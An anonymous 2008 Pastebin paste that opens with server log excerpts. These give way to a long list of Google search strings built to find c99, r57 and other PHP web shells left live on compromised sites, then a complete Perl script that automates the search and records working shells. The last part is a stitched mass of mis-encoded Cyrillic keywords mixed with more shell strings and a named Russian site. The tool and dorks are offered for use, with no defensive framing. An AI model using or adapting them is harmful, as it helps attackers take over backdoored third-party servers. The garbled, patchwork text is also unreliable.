Recent Posts
None | 3 sec ago
Python | 8 sec ago
OCaml | 18 sec ago
None | 27 sec ago
None | 33 sec ago
Python | 45 sec ago
None | 59 sec ago
Python | 1 min ago
Perl | 1 min ago
None | 1 min ago
Free Subdomains
Want a pastebin.com sub-domain for your community?
learn more...
What is pastebin?
Pastebin is a website that hosts all your text & code on dedicated servers for easy sharing.
learn more...
Learn a little bit about the new Pastebin.com on our help page. hide message
By Anonymous on the 14th of Nov 2008 07:41:13 PM Download | Raw | Embed | Report
  1.                    root:nobody in logs
  2.  
  3.  
  4. > [/var/log/auth.log]
  5. >
  6. > Sep 13 05:15:01 serv CRON[6665]: (pam_unix) session opened for user root by
  7. > (uid=0)
  8. >
  9. > Sep 13 05:15:01 serv su[6686]: + ??? root:nobody
  10. >
  11. > Sep 13 05:15:01 serv su[6686]: (pam_unix) session opened for user nobody by
  12. > (uid=0)
  13. >
  14. > Sep 13 05:15:05 serv CRON[6665]: (pam_unix) session closed for user root
  15.  
  16.                  ---------------------------------
  17.  
  18.           And what are we supposed to think about it?
  19.  
  20.  
  21. > [/var/log/messages]
  22. >
  23. > Sep 13 04:41:48 serv kernel: New not syn:IN=eth1 OUT=
  24. > MAC=00:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=60.xx.xx.xx
  25. > DST=192.168.0.1 LEN=48 TOS=0x00 PREC=0x00 TTL=102 ID=7224 PROTO=TCP SPT=80
  26. > DPT=64585 WINDOW=16384 RES=0x00 ACK SYN URGP=0
  27. >
  28. > Sep 13 05:15:05 router syslogd 1.4.1#17: restart.
  29.  
  30.  
  31. ==============================================================
  32.  
  33.  
  34.  
  35. ===================================================
  36.  
  37. search site: c99.php
  38.  
  39. ============================
  40.  
  41. d=99(nobody) gid=99(nobody) groups=99(nobody)Safe-mode: OFF (not secure)
  42.  
  43.  
  44. =================================
  45.  
  46. c99.php =ls
  47.  
  48. ===============================
  49.  
  50. (root)|root&
  51.  
  52. ===========================
  53.  
  54. (root-0-999)|N765-30-10|0
  55.  
  56. ====================
  57.  
  58.  
  59. (root)%7croot&
  60.  
  61. ========================
  62.  
  63. root root drwx
  64.  
  65. ============================
  66.  
  67. PostgreSQL: OFF c99.php
  68.  
  69. ======================
  70.  
  71.  
  72. powered by Captain Crunch Security Team inurl:/c99.php
  73.  
  74.  
  75.  
  76. inurl:/c99.php C99Shell v. 1.0 pre-release build #12 C99Shell v.
  77.  
  78.  
  79. -----------------------------
  80.  
  81. allintext: [ ] [ SQL ] [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
  82.  
  83. =============================================================
  84.  
  85. c99.php Safe-mode: OFF (not secure) 19.09.2008
  86.  
  87. ========================================
  88.  
  89. intitle:!C99Shell v. 1.0 pre-release build #16! root
  90.  
  91. (r
  92.  
  93.  
  94. root c99.php
  95.  
  96. inurl:c99.php uid=0(root)
  97.  
  98. c99 shell v.1.0 (roots)
  99.  
  100.  
  101. intitle:"c99shell" filetype:php root
  102.  
  103.  
  104.  
  105. !C99Shell v. 1.0 pre-release build #16! root !!~~
  106.  
  107.  
  108. search site:  uid=0(root) Safe-mode: OFF
  109.  
  110.  
  111. =======================================================
  112.  
  113. inurl:c99.php Safe-mode: OFF (not secure)
  114. ili
  115. inurl:c99.php Safe-mode: ON
  116. ili
  117. inurl:r57.php Safe_mode: OFF
  118. ili
  119. inurl:r57.php Safe_mode: ON
  120. ili
  121. intitle:.com - phpshell
  122. ili
  123. intitle:.org - phpshell
  124. ili
  125. inurl:.com - ashshell
  126. ili
  127. intitle:.org - Locus7Shell
  128. ili
  129. intitle:.com - Locus7Shell
  130.  
  131. ========================================================
  132.  
  133.  
  134. c99.php  root/root
  135.  
  136.  
  137. ============================
  138.  
  139.  
  140.  
  141. lrwxrwxrwx 1 root root
  142.  
  143.  
  144. =================================
  145.  
  146. Owned by hacker
  147.  
  148.  
  149.  
  150. ===================================
  151.  
  152.  
  153.  
  154. #!/usr/bin/perl
  155.  
  156. use strict;
  157. use warnings;
  158. use LWP::UserAgent;
  159.  
  160. usage() unless $ARGV[2];
  161.  
  162. my @searchTerm;
  163. my @checkTerm;
  164.  
  165. if(lc($ARGV[0]) eq "r57") {
  166.         push(@searchTerm, "inurl:r57.php");
  167.         push(@searchTerm, "\"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]\"");
  168.         push(@searchTerm, "intitle:r57shell");
  169.         push(@checkTerm, "r57");
  170.         push(@checkTerm, "safe_mode");
  171. } elsif(lc($ARGV[0]) eq "c99") {
  172.         push(@searchTerm, "inurl:c99.php");
  173.         push(@searchTerm, "\"Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout\"");
  174.         push(@searchTerm, "intitle:\" - phpshell\"");
  175.         push(@searchTerm, "intitle:\" - c99shell\"");
  176.         push(@checkTerm, "c99");
  177.         push(@checkTerm, "Safe-mode");
  178. } elsif(lc($ARGV[0]) eq "mys") {
  179.         push(@searchTerm, "\"Auto error traping enabled\"");
  180.         push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\"");
  181.         push(@checkTerm, "MyShell");
  182.         push(@checkTerm, "Echo commands");
  183. } elsif(lc($ARGV[0]) eq "phs") {
  184.         push(@searchTerm, "intitle:\"PHP Shell 1.5\"");
  185.         push(@searchTerm, "intitle:\"PHP Shell 1.6\"");
  186.         push(@searchTerm, "intitle:\"PHP Shell 1.7\"");
  187.         push(@searchTerm, "\"Enable stderr-trapping?\"");
  188.         push(@checkTerm, "PHP Shell");
  189.         push(@checkTerm, "Choose new working");
  190. } elsif(lc($ARGV[0]) eq "phm") {
  191.         push(@searchTerm, "\"PHPShell by Macker\"");
  192.         push(@searchTerm, "\"[ Main Menu ]      [ PHPKonsole ]      [ Haxplorer ]\"");
  193.         push(@checkTerm, "Haxplorer");
  194.         push(@checkTerm, "PHPKonsole");
  195. } elsif(lc($ARGV[0]) eq "rem") {
  196.         push(@searchTerm, "intitle:\"phpRemoteView: \"");
  197.         push(@searchTerm, "\"REMVIEW TOOLS\"");
  198.         push(@checkTerm, "phpRemoteView");
  199.         push(@checkTerm, "perms");
  200. }
  201.  
  202. if(!@searchTerm) {
  203.         print "Error: [shell to find] is a unknown shell\n" and die;
  204. }
  205.  
  206. my $outputOn;
  207.  
  208. if(lc($ARGV[1]) eq "on") {
  209.         $outputOn = 1;
  210. } elsif(lc($ARGV[1]) eq "off") {
  211.         $outputOn = 0;
  212. } else {
  213.         print "Error: [screen output] must be \"on\" or \"off\"\n" and die;
  214. }
  215.  
  216. my $outputFile;
  217.  
  218. if(index(lc($ARGV[2]), ".htm") > 0) {
  219.         $outputFile = $ARGV[2];
  220. } else {
  221.         print "Error: [output HTML file] must be *.htm or *.html\n" and die;
  222. }
  223.  
  224. open(FILEHANDLE, ">$outputFile");
  225. print FILEHANDLE "\n";
  226. close FILEHANDLE;
  227.  
  228. my $userAgent = LWP::UserAgent->new;
  229. $userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");
  230.  
  231. my @resultLinks;
  232.  
  233. foreach(@searchTerm) {
  234.         print "[*] Query for \"$_\"\n" if($outputOn == 1);
  235.        
  236.         my $isLastPage = 0;
  237.        
  238.         for(my $gPage = 0; ; $gPage++) {
  239.                 if($isLastPage == 1) { last; }
  240.                
  241.                 my $gRequest =  HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
  242.                 my $gResource = $userAgent->request($gRequest);
  243.                
  244.                 if($gResource->is_success) {
  245.                         my @gContent = split("
  246. ", $gResource->content);
  247.                         if(@gContent < 10) { $isLastPage = 1; };
  248.                        
  249.                         for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) {
  250.                                 my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6);
  251.                                 $shellLink = substr($shellLink, 0, index($shellLink, "\""));
  252.                                
  253.                                 print "[*] Check status of site \"$shellLink\"\n" if($outputOn == 1);
  254.                                
  255.                                 my $sRequest = HTTP::Request->new(GET => $shellLink);
  256.                                 my $sResource = $userAgent->request($sRequest);
  257.                                
  258.                                 if($sResource->is_success) {
  259.                                         if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
  260.                                                 open(FILEHANDLE, ">>$outputFile");
  261.                                                 print FILEHANDLE "Link: $shellLink
  262. \n";
  263.                                                 print FILEHANDLE "Search Term: $_
  264.  
  265. \n";
  266.                                                 close FILEHANDLE;
  267.                                                
  268.                                                 print "[+] Found shell: $shellLink\n" if($outputOn == 1);
  269.                                         } else {
  270.                                                 print "[-] No shell\n" if($outputOn == 1);
  271.                                         }
  272.                                 } else {
  273.                                         print "[-] Offline\n" if($outputOn == 1);
  274.                                 }
  275.                         }
  276.                        
  277.                         sleep 20; #wait 20 seconds so google dont think we are a bot
  278.                 } else {
  279.                         print "Unable to query google\n" and die;
  280.                 }
  281.         }
  282. }
  283.  
  284. open(FILEHANDLE, ">>$outputFile");
  285. print FILEHANDLE "
  286.  
  287. Find PHP Shells via Google - by DiA/RRLF
  288. ";
  289. close FILEHANDLE;
  290.  
  291. sub usage {
  292.         print qq(
  293. Find PHP Shells via Google - by DiA/RRLF (http://www.vx-dia.de.vu)
  294.        
  295. Usage:   perl $0 [shell to find] [screen output] [output HTML file]
  296.                   [shell to find] can be:
  297.                         r57 - find r57shell
  298.                         c99 - find c99shell
  299.                         mys - find MyShell
  300.                         phs - find PHP Shell
  301.                         phm - find PHPShell (Macker)
  302.                         rem - find phpRemoteView
  303.                   [screen output] can be:
  304.                         on  - every step the script doas get printed on the screen
  305.                         off - no output, the script just writes to the output file
  306.                   [output HTML file] must be:
  307.                         *.htm or *.html
  308.                                                            
  309. Example: perl $0 c99 on c99shells.htm
  310.          perl $0 mys off manyshells.htm
  311.  
  312. )       and exit;
  313. }
  314.  
  315.  
  316. =============================================================
  317.  
  318.  
  319.  
  320.                         &#1583;&#1608;&#1585;&#1603;&#1575;&#1578; &#1588;&#1604;99 &#1576;&#1575;&#1604;&#1585;&#1608;&#1587;&#1610;
  321.  
  322.                                      
  323.  
  324. intitle:c99shell uname
  325.  
  326. &#1072;&#1083;&#1090;&#1072;&#1081;&#1089;&#1082;&#1072;&#1103; &#1082;&#1088;&#1091;&#1075;&#1086;&#1089;&#1074;&#1077;&#1090;&#1082;&#1072;
  327.  
  328. c99shell [file on secure ok ]
  329.  
  330. intitle:C99Shell v. 1.0 pre-release uname
  331.  
  332. 7          1.93%  &#1086;&#1073;&#1086;&#1080; &#1076;&#1083;&#1103; &#1088;&#1072;&#1073;&#1086;&#1095;&#1077;&#1075;&#1086; &#1089;&#1090;&#1086;&#1083;&#1072;
  333.  
  334. c99shell v. 1.0 pre-release build
  335. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249; &#1057;&#8222;&#1056;&#1109;&#1057;&#1026;&#1057;&#1107;&#1056;&#1112;
  336. &#1056;&#1038;&#1056;&#1111;&#1056;»&#1056;°&#1056;&#1030; &#1056;&#1116;&#1056;&#1105;&#1056;¶&#1056;&#1029;&#1057;&#1039;&#1057;&#1039; &#1056;&#1113;&#1056;°&#1057;&#8218;&#1057;&#1107;&#1056;&#1029;&#1057;&#1034;
  337. c99shell drwxr
  338. c99shell safe mode
  339. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1057;&#1027; &#1057;&#1027;&#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#8470; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  340. &#1044;&#1086;&#1088;&#1086;&#1075;&#1072; &#1085;&#1072; &#1059;&#1082;&#1086;&#1082;
  341. &#1087;&#1077;&#1088;. &#1041;&#1086;&#1075;&#1086;&#1084;&#1091;&#1102;&#1079;
  342. C99Shell v. 1.0
  343.  
  344. Encoder Tools Proc.FTP brute Sec.SQL PHP-code
  345. c99shell uname
  346. com_simplefaq
  347. uname -a: Linux c99shell
  348. www.altair-altai.ru
  349. &#1056;&#8216;&#1056;&#1105;&#1056;»&#1056;µ&#1057;&#8218;&#1057;&#8249; &#1056;&#1169;&#1056;&#1109; &#1056;&#8216;&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;»&#1056;°
  350. &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;
  351. &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108; &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  352. &#1095;&#1090;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  353. BBCode &#1056;&#1030;&#1056;&#1108;&#1056;»&#1057;&#1035;&#1057;&#8225;&#1056;µ&#1056;&#1029;
  354. C99Shell v. 1.0 pre-release uname
  355. altair-altai.ru
  356. c99shell
  357. c99shell safe mode:ON
  358. c99shell.php v.1.0... 2008
  359. free c99shell
  360. intitle:!C99Shell v. 1.0 pre-release build #16! root
  361. intitle:- c99shell
  362. &#1043;&#1086;&#1088;&#1103;&#1095;&#1080;&#1081; &#1082;&#1083;&#1102;&#1095; &#1061;&#1072;&#1082;&#1072;&#1089;&#1080;&#1103;
  363. &#1055;&#1086;&#1080;&#1089;&#1082; &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082;&#1086;&#1074; &#1040;&#1083;&#1090;&#1072;&#1081;
  364. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  365. &#1056;&#1115;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218;&#1057;&#8249; &#1057;&#1027;&#1056;&#1111;&#1056;»&#1056;°&#1056;&#1030;&#1056;&#1109;&#1056;&#1030; &#1056;&#1111;&#1056;&#1109; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1057;&#1035; 3 &#1056;&#1108;.&#1057;&#1027;.
  366. &#1056;&#1030;&#1057;&#8249;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ 12 &#1056;&#1105;&#1057;&#1035;&#1056;&#1029;&#1057;&#1039;
  367. &#1056;&#1169;&#1057;&#1036;&#1057;&#1107;-&#1056;&#1169;&#1056;°&#1056;&#1112;&#1056;°&#1057;&#1027;&#1056;&#1108;
  368. &#1056;&#1109;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218; &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  369. &#1059;&#1047;&#1059;&#1050;&#1040;
  370. &#1063;&#1058;&#1054; &#1042;&#1047;&#1071;&#1058;&#1068; &#1057; &#1057;&#1054;&#1041;&#1054;&#1049; &#1042; &#1055;&#1054;&#1061;&#1054;&#1044;
  371. &#1063;&#1090;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  372. &#1074;&#1077;&#1083;&#1086;&#1089;&#1080;&#1087;&#1077;&#1076;&#1085;&#1099;&#1077; &#1087;&#1086;&#1093;&#1086;&#1076;&#1099;
  373. &#1083;&#1099;&#1078;&#1085;&#1099;&#1081; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;
  374. &#1086;&#1073;&#1086;&#1080; &#1088;&#1072;&#1073;&#1086;&#1095;&#1077;&#1075;&#1086; &#1089;&#1090;&#1086;&#1083;&#1072;
  375. &#1086;&#1089;&#1086;&#1073;&#1077;&#1085;&#1085;&#1086;&#1089;&#1090;&#1080; &#1083;&#1099;&#1078;&#1085;&#1086;&#1075;&#1086; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;&#1072;
  376. &#1090;&#1091;&#1088; &#1041;&#1072;&#1088;&#1085;&#1072;&#1091;&#1083;-&#1089;. &#1059;&#1089;&#1090;&#1100; -&#1050;&#1072;&#1085; -&#1057; &#1052;&#1077;&#1085;&#1076;&#1091;&#1088;-&#1057;&#1086;&#1082;&#1082;&#1086;&#1085;-&#1052;&#1091;&#1083;&#1100;&#1090;&#1080;&#1085;&#1089;&#1082;&#1080;&#1077; &#1086;&#1079;&#1077;&#1088;&#1072;
  377. &#1103;&#1079;&#1075;&#1091;&#1083;&#1103;&#1084;
  378. !C99Shell v. 1.0 pre
  379. -c99shell
  380. 2008 &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;¤&#1056;°&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1057;&#8249;
  381. =*-*c99shell
  382. C99Shell v. 1.0 pre-release build #16
  383. C99Shell v. 1.0 pre-release build Safe-mode: OFF (not secure)
  384. C99Shell v. 1.4 pre-release build
  385. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
  386. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback
  387. c99 shell pre-release safe mode:off not secure
  388. c99Shell Unselect
  389. c99Shell drwxr-xr-x
  390. c99shell *ok*
  391. c99shell 1.4
  392. c99shell Apache
  393. c99shell Make Dir [ok]
  394. c99shell apache
  395. c99shell drwx
  396. c99shell php uname
  397. c99shell powered by Captain Crunch Security Team
  398. c99shell powered by captain crunch security team
  399. c99shell safe mode uname
  400. c99shell v 1.0
  401. c99shell v 1.0 pre release build
  402. c99shell v. 1.0 pre-release build #16 powered by captain crunch
  403. cih.ms
  404. filetype: c99shell
  405. http://www.altair-altai.ru/content/view/25/42/
  406. intext:owned by hacker
  407. intitle:c99shell root
  408. ok c99shell uname
  409. uname-a: linux c99shell 2008
  410. www.altair-altay.ru
  411. www/altair-altai/ru
  412. &#1040;&#1051;&#1068;&#1058;&#1040;&#1048;&#1056;-&#1040;&#1051;&#1058;&#1040;&#1049;
  413. &#1040;&#1073;&#1072;&#1082;&#1072;&#1085;&#1089;&#1082;&#1080;&#1081; &#1093;&#1088;&#1077;&#1073;&#1077;&#1090; &#1040;&#1083;&#1090;&#1072;&#1081;&#1089;&#1082;&#1086;&#1075;&#1086; &#1082;&#1088;&#1072;&#1103;
  414. &#1040;&#1083;&#1090;&#1072;&#1081;
  415. &#1040;&#1083;&#1100;&#1090;&#1072;&#1080;&#1088; &#1040;&#1083;&#1090;&#1072;&#1081;
  416. &#1040;&#1083;&#1100;&#1090;&#1072;&#1080;&#1088;-&#1072;&#1083;&#1090;&#1072;&#1081;
  417. &#1042;&#1089;&#1077; &#1095;&#1090;&#1086; &#1085;&#1091;&#1078;&#1085;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  418. &#1044;&#1086;&#1083;&#1080;&#1085;&#1072; &#1052;&#1091;&#1084;&#1084;&#1080;-&#1058;&#1088;&#1086;&#1083;&#1083;&#1077;&#1081; &#1092;&#1086;&#1090;&#1086;
  419. &#1044;&#1086;&#1083;&#1080;&#1085;&#1072; &#1052;&#1091;&#1084;&#1084;&#1080;-&#1058;&#1088;&#1086;&#1083;&#1083;&#1077;&#1081; &#1092;&#1086;&#1090;&#1086;&#1075;&#1088;&#1072;&#1092;&#1080;&#1080;
  420. &#1047;&#1072;&#1073;&#1088;&#1086;&#1089;&#1082;&#1072; &#1085;&#1072; &#1040;&#1083;&#1090;&#1072;&#1077;
  421. &#1050;&#1072;&#1082; &#1089;&#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1090;&#1100; &#1084;&#1077;&#1085;&#1102; &#1085;&#1072; 20&#1095;&#1077;&#1083; &#1087;&#1086;&#1093;&#1086;&#1076;&#1085;&#1086;&#1075;&#1086; &#1087;&#1083;&#1072;&#1085;&#1072; &#1085;&#1072; 3 &#1076;&#1085;&#1103;
  422. &#1050;&#1086;&#1085;&#1085;&#1099;&#1077; &#1090;&#1091;&#1088;&#1099; &#1074; &#1040;&#1073;&#1072;&#1082;&#1072;&#1085;&#1077;
  423. &#1051;&#1099;&#1078;&#1085;&#1099;&#1081; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;
  424. &#1054;&#1041;&#1054;&#1048; &#1053;&#1040; &#1056;&#1040;&#1041;&#1054;&#1063;&#1048;&#1049; &#1057;&#1058;&#1054;&#1051;
  425. &#1054;&#1073;&#1086;&#1080; &#1076;&#1083;&#1103; &#1088;&#1072;&#1073;&#1086;&#1095;&#1077;&#1075;&#1086; &#1089;&#1090;&#1086;&#1083;&#1072;
  426. &#1056;&#1106;&#1056;&#8250;&#1056;&#1118;&#1056;&#1106;&#1056;&#8482; &#1056;&#1025;&#1056;&#1106;&#1056;&#8217;&#1056;&#8250;&#1056;&#65533;&#1056;&#1116;&#1056;&#1038;&#1056;&#1113;&#1056;&#65533;&#1056;&#8226; &#1056;&#1115;&#1056;&#8212;&#1056;&#8226;&#1056; &#1056;&#1106;
  427. &#1056;&#1106;&#1056;&#8250;&#1056;¬&#1056;&#1118;&#1056;&#1106;&#1056;&#65533;&#1056;  &#1056;&#1106;&#1056;&#8250;&#1056;&#1118;&#1056;&#1106;&#1056;&#8482;
  428. &#1056;&#1106;&#1056;&#1030;&#1057;&#8218;&#1056;&#1109;&#1056;&#1112;&#1056;&#1109;&#1056;±&#1056;&#1105;&#1056;»&#1057;&#1034;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249; &#1056;&#1111;&#1056;&#1109; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1057;&#1035;
  429. &#1056;&#1106;&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  430. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1025;&#1056;°&#1056;&#1030;&#1056;»&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1109;&#1056;·&#1056;µ&#1057;&#1026;&#1056;° &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;
  431. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249;
  432. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;-&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249;
  433. &#1056;&#1106;&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;-&#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  434. &#1056;&#1106;&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;-&#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  435. &#1056;&#8216;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1030;&#1057;&#8224;&#1056;&#1109;&#1056;&#1030;
  436. &#1056;&#8216;&#1057;&#1026;&#1056;°&#1057;&#8218;&#1057;&#1034;&#1057;&#1039; &#1056;&#8220;&#1056;&#1109;&#1056;&#1030;&#1056;&#1109;&#1057;&#1026; &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;&#1105;&#1056;&#1112;&#1056;&#1109;&#1057;&#1027;&#1057;&#8218;&#1057;&#1034;
  437. &#1056;&#8217;&#1057;&#1027;&#1057;&#8216; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;&#1056;°
  438. &#1056;&#8212;&#1056;°&#1056;±&#1057;&#1026;&#1056;&#1109;&#1057;&#1027;&#1056;&#1108;&#1056;° &#1056;&#1029;&#1056;° &#1056;&#1030;&#1056;µ&#1057;&#1026;&#1057;&#8230;&#1056;&#1029;&#1057;&#1035;&#1057;&#1035; &#1056;&#1113;&#1056;°&#1057;&#8218;&#1057;&#1107;&#1056;&#1029;&#1057;&#1034;
  439. &#1056;&#1113;&#1057;&#1107;&#1056;&#1169;&#1056;° &#1056;&#1112;&#1056;&#1109;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1057;&#1027;&#1056;&#1169;&#1056;µ&#1056;»&#1056;°&#1057;&#8218;&#1057;&#1034; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1057;&#1107;&#1057;&#1035; &#1057;&#1026;&#1056;°&#1056;&#1169;&#1056;&#1105;&#1056;°&#1056;»&#1056;&#1108;&#1057;&#1107;
  440. &#1056;&#1114;&#1056;&#1109;&#1056;»&#1056;&#1109;&#1056;&#1169;&#1056;°&#1056;&#1030;&#1056;&#1108;&#1056;&#1105;&#1056;&#1029;
  441. &#1056;&#1119;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;&#1029;&#1056;&#1105;
  442. &#1056;&#1119;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;µ&#1057;&#1027;&#1057;&#8218;&#1056;&#1030;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109; &#1057;&#1027;&#1057;&#1026;&#1056;µ&#1056;&#1169;&#1056;&#1029;&#1056;µ&#1056;&#8470; &#1056;°&#1056;·&#1056;&#1105;&#1056;&#1105;
  443. &#1056;&#1038;&#1056;°&#1056;&#1030;&#1057;&#1107;&#1057;&#8364;&#1056;&#1108;&#1056;&#1105;
  444. &#1056;&#1118;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;±
  445. &#1056;§&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  446. &#1056;&#1025;&#1056;°&#1056;&#1030;&#1056;»&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1109;&#1056;·&#1056;µ&#1057;&#1026;&#1056;°
  447. &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; or &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249;
  448. &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; &#1056;&#1029;&#1056;° &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;µ
  449. &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470;
